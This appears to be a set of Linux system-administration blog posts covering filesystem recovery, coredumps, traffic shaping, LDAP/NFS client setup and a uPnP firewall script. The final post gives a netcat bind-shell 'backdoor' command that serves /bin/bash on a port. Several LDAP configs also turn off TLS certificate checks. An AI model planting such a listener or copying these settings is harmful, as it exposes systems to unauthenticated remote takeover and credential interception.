Recover from accidental mkfs using fsck

Recently I accidentally ran mkfs.ext3 on the wrong RAID1 array.

As soon as I realized what had happened, I shut power off from the PC.

Booting to a live CD, I ran

mdadm –assemble /dev/md0 /dev/sda1 /dev/sdb1

fsck -y /dev/md0

I was able to then mount the drive

mkdir /media/md0

mount /dev/md0 /media/md0

ls /media/md0/lost+found

And the majority of my files were saved.

Check to see if your filesystem is ext2 or ext3

mount | grep md0

If it’s ext2, convert it to ext3

umount /media/md0

tune2fs -j /dev/md0

WARNING: If you choose to run fsck manually (without -y), choosing “n” to Clear? and “y” to Fix? will cause you to lose that file.

Debian Corefiles

If you have any issues with programs segfaulting, it can be useful to allow coredumps in order to see what happened.

You first have to allow coredumps

vi /etc/security/limits.conf

*  –  core  100000

@users  –  core  0

core is measured in kbytes, and core files can be fairly large (the simple script below generates a 350kb file).  Do not set this to unlimited for regular users!

echo 1 > /proc/sys/kernel/core_uses_pid

mkdir /tmp/core

echo “/tmp/core/dump” > /proc/sys/kernel/core_pattern

ulimit -c 100000

To test it let’s create a script that will cause a coredump.

vi core_dump.sh

#!/bin/bash
#core_dump.sh
kill -s $$
#end

chmod +x core_dump.sh
./core_dump.sh

ls /tmp/cores

dump.14594 core_dump.sh

To view the corefile, you need gdb.

apt-get install gdb

gdb -c dump.13594

Easy Ubuntu Traffic Shaping

I manage a Linux router that provides internet access to tenants in an apartment building. From time to time, a user will do something that will ruin the connection.

It can be Limewire, BitTorrent or just Skype… but the end result is a latency of more than 400ms!

Recently I came across a simple way to do this on Debian/Ubuntu.

apt-get install wondershaper

The usage is simple

wondershaper eth0 4600 490

This would limit you to 4600 kbits download and 490 kbits upload.

Before you limit your speed, make sure your connection is not being heavily used and ping google.com (and a few other servers). Get a good idea of your latency (Mine is 15ms at night, and 25ms during the day).

You should find out your actual speed; I suggest speedtest.net for testing. You should also do this across several days at different times!

Let’s say you find out that you have 5800 down and 600 up. If you ping google while you’re testing your connection you are going to notice that your latency goes up.

Since you probably want to avoid this, try different values for wondershaper until your latency is a low value even when you are using all avaible bandwidth. I find that 80% of your max speed is a good value to shoot for.

I find that I can use bittorrent on multiple computers and use speedtest.net and still have a latency of around 30ms limiting a 6000/600 connection to 5000/500.

If you come across any errors when running this script (Debian has this problem for me), just comment out the line causing the error. Everything will still work.

Apache2 Bandwidth Limiting in Ubuntu Hardy 8.04

Unfortunately there is no libapache2-mod-bw for Ubuntu, so limiting bandwidth used by apache isn’t possible by default. Follow these steps to enable it.

wget http://ivn.cl/files/source/mod_bw-0.8.tgz

tar xvzf mod_bw-0.8.tgz

cd mod_bw

apxs2 -i -a -c mod_bw.c

You will probably get this error

apxs:Error: Activation failed for custom /etc/apache2/httpd.conf file..
apxs:Error: At least one `LoadModule’ directive already has to exist..

It’s safe to ignore this.

vi /etc/apache2/mods-available/mod-bw.load

LoadModule bw_module /usr/lib/apache2/modules/mod_bw.so

vi /etc/apache2/mods-available/mod-bw.conf

BandWidthModule On
BandWidth all 40000
MinBandWidth all 10000
ForceBandWidthModule On

Set permissions

chown www-data /etc/apache2/mods-available/mod-bw*

Activate the module

a2enmod mod-bw

(To deactivate use: a2dismod mod-bw)

Restart apache2

/etc/init.d/apache2 force-reload

Download a file (I suggest doing it remotely to test it), and you should be limited to around 40 kilobytes/second total, with each user guaranteed 10 kilobytes/second. Change this number accordingly.

pine using imap/postfix on Ubuntu/Debian

If you’d like to use pine on a Ubuntu or Debian server, chances are your current email system isn’t using the old /var/mail/user way of doing things. 🙂

apt-get install alpine

ln -s /usr/bin/alpine /usr/bin/pine

Run pine to generate a ~/.pinerc file, and change the following lines

user-domain=your-domain.com

inbox-path={your-domain.com:143}INBOX

smtp-server=your-domain.com/novalidate-cert/user=$USER

If you don’t use authenticated SMTP, just comment out smtp-server

You should probably copy this file to everyone’s home directory. Make sure to update permissions!

cd /home

for x in *; do

mv /home/$x/.pinerc /home/$x/.pinerc.bak

cp /etc/skel/.pinerc /home/$x/

chown $x /home/$x/.pinerc

done

Ubuntu 8.04 Hardy LDAP Client

Ubuntu 7.10 was a nightmare when it came to setting up ldap, but 8.04 improves this process quite a bit.

We are going to set up a Hardy client on a desktop machine, which involves using NFS (for /home) and allowing all desktop users to do desktop tasks.

apt-get install libpam-ldap libnss-ldap nss-updatedb libnss-db nfs-common nscd

Answer the questions; unlike Debian they should actually be put in the configuration file.

Make sure to transfer over your certifiate if you use SSL. I like to use /etc/ldap/ssl

Edit /etc/ldap.conf (which both libnss and libpam use).

host 192.168.1.1
base dc=example,dc=com

#This is important! Don't use ldap:///192.168.1.1
uri ldap://example.com/
ldap_version 3
rootbinddn cn=admin,dc=example,dc=com
port 389
bind_policy soft
pam_password crypt
ssl start_tls
tls_checkpeer no
tls_cacertfile /etc/ldap/ssl/cert.pem
nss_initgroups_ignoreusers avahi,avahi-autoipd,backup,bin,daemon,dhcp,games,gdm,gnats,haldaemon,hplip,irc,klog,libuuid,list,lp,mail,man,messagebus,news,polkituser,proxy,pulse,root,sync,sys,syslog,uucp,www-data

Now edit /etc/ldap/ldap.conf

BASE    dc=example,dc=com
URI    ldap://example.com
TLS_CACERT /etc/ldap/ssl/cert.pem
TLS_REQCERT never

/etc/pam.d/common-account

account    sufficient   pam_ldap.so
account    required     pam_unix.so

/etc/pam.d/common-auth

auth       sufficient   pam_ldap.so
auth       required     pam_unix.so nullok_secure use_first_pass

/etc/pam.d/common-password

password   sufficient   pam_ldap.so
password   required     pam_unix.so nullok obscure min=4 max=8 md5

/etc/pam.d/common-session

session    required     pam_unix.so
session    required     pam_mkhomedir.so skel=/etc/skel/
session    optional     pam_ldap.so

/etc/nsswitch.conf


passwd: files ldap
group: files ldap
shadow: files ldap

hosts:          files mdns4_minimal [NOTFOUND=return] dns mdns4
networks:       files

protocols:      db files
services:       db files
ethers:         db files
rpc:            db files

Now we want to make sure users are assigned to the correct groups when they log in, so add the following to /etc/security/groups.conf
gdm;*;*;Al0000-9000;floppy,audio,cdrom,video,plugdev,scanner

Hal does not recognize this, however, so delete the following entries from /etc/dbus-1/system.d/hal.conf


<deny send_interface="org.freedesktop.Hal.Device.Volume"/>
<deny send_interface="org.freedesktop.Hal.Device.Volume.Crypto"/>

We need to edit /etc/pam.d/gdm for the groups.conf file to take effect, so add the following

auth optional pam_group.so

As root, run

nss_updatedb ldap

To mount /home over NFS, add the following to /etc/fstab

192.168.1.1:/home       /home   nfs defaults 0 0

Universal Plug and Play (uPnP) in Debian

Before I begin, uPnP does have some security implications. Users that can send uPnP requests can open any port to any other computer. Please read the comments below for more details.

If you are currently using a Linux router on a home network, you should consider uPnP. uPnP allows computers to request ports be opened for them, so applications that require open ports can work without work of the owner of the Linux router.

apt-get install libupnp0 linux-igd

Edit /etc/default/upnpd and specify your external and internal interfacecs; upnp does not support multiple interfaces but I suspect multiple instances of this program could accomplish this; just replace the /etc/init.d/upnpd file with a custom one like this

#!/bin/bash

case $1 in

start)

upnpd eth0 eth1

upnpd eth0 eth2

;;

stop)

killall upnpd

;;

esac

Restart the daemon, and you should see clients requesting ports in /var/log/syslog (grep for upnp).

If you do not, make sure that you see the following line in “route”

239.0.0.0       *               255.0.0.0       U     0      0        0 eth3

Where eth3 is your internal interface. If not, add it with

route add -net 239.0.0.0 netmask 255.0.0.0 eth3

Also, if you are blocking any ports with your firewall configuration, you may have to do the following to allow your clients request to reach the server.

iptables -A INPUT -s 192.168.1.0/24 -p tcp --dport 2869 -j ACCEPT
iptables -A INPUT -s 192.168.1.0/24 -p udp --dport 1900 -j ACCEPT

Where 192.168.1.0/24 is your internal network.

A good way to test to make sure this is working is using the Azureus bittorrent client’s NAT checking tool.

Below is a two network firewall script that I am currently using with uPnP; I can’t make any guarantees to how secure it is but it works quite well.


IP2="76.249.179.145"
IP3="76.249.179.147"
/sbin/ip addr add dev eth0 $IP2
/sbin/ip addr add dev eth0 $IP3
/sbin/depmod -a
/sbin/modprobe ip_tables
/sbin/modprobe ip_conntrack
/sbin/modprobe ip_conntrack_ftp
/sbin/modprobe ip_conntrack_irc
/sbin/modprobe iptable_nat
/sbin/modprobe ip_nat_ftp
/sbin/modprobe ip_nat_irc
IPT="/sbin/iptables"
INT0="eth0"
INT2="eth2"
INT3="eth3"
echo "1" > /proc/sys/net/ipv4/ip_forward
echo 1 > /proc/sys/net/ipv4/tcp_syncookies
echo "65535" > /proc/sys/net/ipv4/ip_conntrack_max
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts
echo "1" > /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses
echo "1" > /proc/sys/net/ipv4/conf/all/accept_redirects
echo "0" > /proc/sys/net/ipv4/conf/all/log_martians
echo 30 > /proc/sys/net/ipv4/tcp_fin_timeout
echo 9000 > /proc/sys/net/ipv4/tcp_keepalive_time
echo 1 > /proc/sys/net/ipv4/tcp_window_scaling
echo 0 > /proc/sys/net/ipv4/tcp_sack
echo 3000 > /proc/sys/net/ipv4/tcp_max_syn_backlog
$IPT -F
$IPT -X
$IPT -Z
$IPT -P INPUT DROP
$IPT -P FORWARD ACCEPT
$IPT -P OUTPUT ACCEPT
$IPT -N DROPLOG
$IPT -A DROPLOG -j ULOG -m limit --limit 2/hour --ulog-nlgroup 1 --ulog-qthreshold 20
$IPT -A DROPLOG -j REJECT
$IPT -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
$IPT -A INPUT -i lo -j ACCEPT
$IPT -A INPUT -i $INT2 -j ACCEPT
$IPT -A INPUT -i $INT3 -j ACCEPT
$IPT -A FORWARD -i $INT3 -o $INT0 -j ACCEPT
$IPT -A FORWARD -i $INT0 -o $INT3 -m state --state ESTABLISHED,RELATED -j ACCEPT
$IPT -A FORWARD -i $INT2 -o $INT0 -j ACCEPT
$IPT -A FORWARD -i $INT0 -o $INT2 -m state --state ESTABLISHED,RELATED -j ACCEPT
$IPT -t nat -A POSTROUTING -s 192.168.1.0/24 -o eth0 -j SNAT --to-source $IP2
$IPT -t nat -A POSTROUTING -s 192.168.2.0/24 -o eth0 -j SNAT --to-source $IP3
$IPT -t nat -A POSTROUTING -s 192.168.1.0/24 -o eth0 -j MASQUERADE
$IPT -t nat -A POSTROUTING -s 192.168.2.0/24 -o eth0 -j MASQUERADE
$IPT -t nat -A POSTROUTING -s 192.168.2.48 -d 192.168.0.0/16 -j ACCEPT
$IPT -t nat -A POSTROUTING -s 192.168.0.0/16 -d 192.168.2.48 -j ACCEPT
$IPT -t nat -A POSTROUTING -s 192.168.1.1 -d 192.168.1.240 -j ACCEPT
$IPT -t nat -A POSTROUTING -s 192.168.1.240 -d 192.168.1.1 -j ACCEPT
$IPT -t nat -A POSTROUTING -s 192.168.2.48 -d 192.168.1.0/16 -j ACCEPT
$IPT -A INPUT -p tcp --dport 22 -j ACCEPT
$IPT -A INPUT -p tcp --dport 80 -j ACCEPT
#Allow uPnP from internal clients
$IPT -A INPUT -s 192.168.1.0/24 -p tcp --dport 2869 -j ACCEPT
$IPT -A INPUT -s 192.168.1.0/24 -p udp --dport 1900 -j ACCEPT
$IPT -A INPUT -s 192.168.2.0/24 -p tcp --dport 2869 -j ACCEPT
$IPT -A INPUT -s 192.168.2.0/24 -p udp --dport 1900 -j ACCEPT
$IPT -A INPUT -i eth2 -j ACCEPT
$IPT -A INPUT -i eth3 -j ACCEPT
$IPT -A INPUT -s 192.168.20.0/24 -j ACCEPT
$IPT -A INPUT -p tcp -s 192.168.1.0/24 --dport 3128 -j ACCEPT
$IPT -A INPUT -p tcp -s 192.168.2.0/24 --dport 3128 -j ACCEPT
$IPT -t nat -A PREROUTING -i eth1 -p tcp --dport 80 -j DNAT --to 192.168.1.1:3128
$IPT -t nat -A PREROUTING -i eth2 -p tcp --dport 80 -j DNAT --to 192.168.1.1:3128
$IPT -t nat -A PREROUTING -i eth3 -p tcp --dport 80 -j DNAT --to 192.168.1.1:3128
$IPT -t nat -A PREROUTING -i eth4 -p tcp --dport 80 -j DNAT --to 192.168.1.1:3128
$IPT -t nat -A PREROUTING -i eth5 -p tcp --dport 80 -j DNAT --to 192.168.1.1:3128
$IPT -A INPUT -i eth0 -p tcp --syn --destination-port 3128 -j DROPLOG
$IPT -A INPUT -j DROPLOG

OpenLDAP Client and NFS on Windows XP

I am assuming your LDAP server is set up as per my previous post.

Before we go further, I would suggest setting up NFS and then updating your /etc/ldap/slapd.conf file

Since Windows (for me) had issues importing my openssl generated cert, I had to allow unencrypted. Depending on your setup, you may not find this to be a suitable option. You must then get a CA cert that isn’t self-signed.

Otherwise, just add ‘by auth’ to your existing access block.


access to attrs=userPassword,shadowLastChange
by tls_ssf=128 ssf=128 dn="cn=admin,dc=uwptechforce,dc=com" write
by tls_ssf=128 ssf=128 anonymous auth
by tls_ssf=128 ssf=128 self write
by auth
by * none

/etc/init.d/slapd restart

Go to http://pgina.org/ and download pGina and Plugins. Install pGina and extract the Plugins archive into c:pGina

You will have to install ldapauth; the installer for x86 and x86_64 is located in C:pGinapluginsLDAP

Unfortunately, from here on out we have to use a graphical configuration utility. Execute C:pGinaconfigure.bat

In the ‘Plugin’ tab, Select this file for the ‘Plugin Path’

C:pGinapluginsldapauthldapauth_plus.dll

You may also want to check the Show authentication method checkbox on this tab; it allows you to select between LDAP and the Local machine in the login window.

Under the Account Interaction tab, check:

Keep Profiles: This will allow you to have persistent files/settings, allow you to make persistent permission changes (remote desktop, file permissions, etc.).

Force Login: If you change your password elsewhere, this will allow you to use the local password with the password you’re authenticated with

Under the Profile tab, you might want to consider changing the default groups for users who log in (separated with semi-colons). By default everyone is a ‘Limited’ user; Power Users might be more appropriate for a Windows workstation. Do not set any options for ‘Profiles’; they do not work and will conflict with LDAP.

We will now configure LDAP using the Plugin Tester; it provides a good way to debug issues and allows you to configure/test in an easy manner. Execute C:pGinaplugin_tester.exe

Browse and select C:pGinapluginsldapauthldapauth_plus.dll. Now let’s configure it.

Click on the ‘Search’ button. Next to LDAP Server enter the hostname/ip of your LDAP server. Set the port to 389. Add “ou=People,dc=server,dc=com” in Contexts.

If you would like to restrict what users can log into pGina, you can set this in the User Configuration tab. I would recommend against changing anything else here until you have a working setup.

Now for the test. Push the pGina Load button. Enter a user/pass and push ‘Login’.

If this does not work, do the usual and debug slapd and look in the Event Viewer in Windows.

Now for NFS.

On any linux LDAP client, you will need to getent passwd > map.txt && getent group > map2.txt to generate a passwd-like file for Windows. No passwords are stored here. I suggest doing this on the NFS server in cron.


0 1 * * 1 getent passwd > /nfs/map.txt
0 1 * * 1 getent group > /nfs/map2.txt

Once a week your passwd and group map will be updated; coincidentally Windows NFS client updates it’s mapping once a week by default. Feel free to change this to happen more often if needed.

Still, you need to copy over map.txt and map2.txt from Linux before NFS works.

Google Windows Services for UNIX Version 3.5. Extract it and run the installer; select ONLY the Client for NFS under NFS and User Name Mappings under Authentication tools for NFS. When prompted, choose ‘passwd-like files’ instead of NIS.

When prompted, browse for your map.txt and map2.txt files.

Create a file called C:nfs.bat


mount 192.168.1.1home Z:

You probably want to run this at startup; just add a new “String Value” in HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun with a name like “mount nfs” and a value of C:nfs.bat

This entry can be easily disabled later with msconfig.

Now run nfs.bat, and check to see that a Z: was created. If so, you’re done!

Remote backdoor on Linux using ‘nc’

nc -l -e /bin/bash -p 10001

Not much to explain here. -l listens for incoming connections, -e executes /bin/bash when you connect, and -p chooses the port to listen on.

You must use a semicolon after each command.

will@hydra:~$ telnet localhost 10001
Trying 127.0.0.1…
Connected to localhost.
Escape character is ‘^]’.
whoami;
will

There you go. Obviously this has the potential for misuse; running this as root will create a remote backdoor after all. But it’s also a very useful administrative tool. Keep in mind that nc is not encrypted in any way, and anyone could use this to connect.

nc terminates after you exit your connection, and only one person can be connected at once.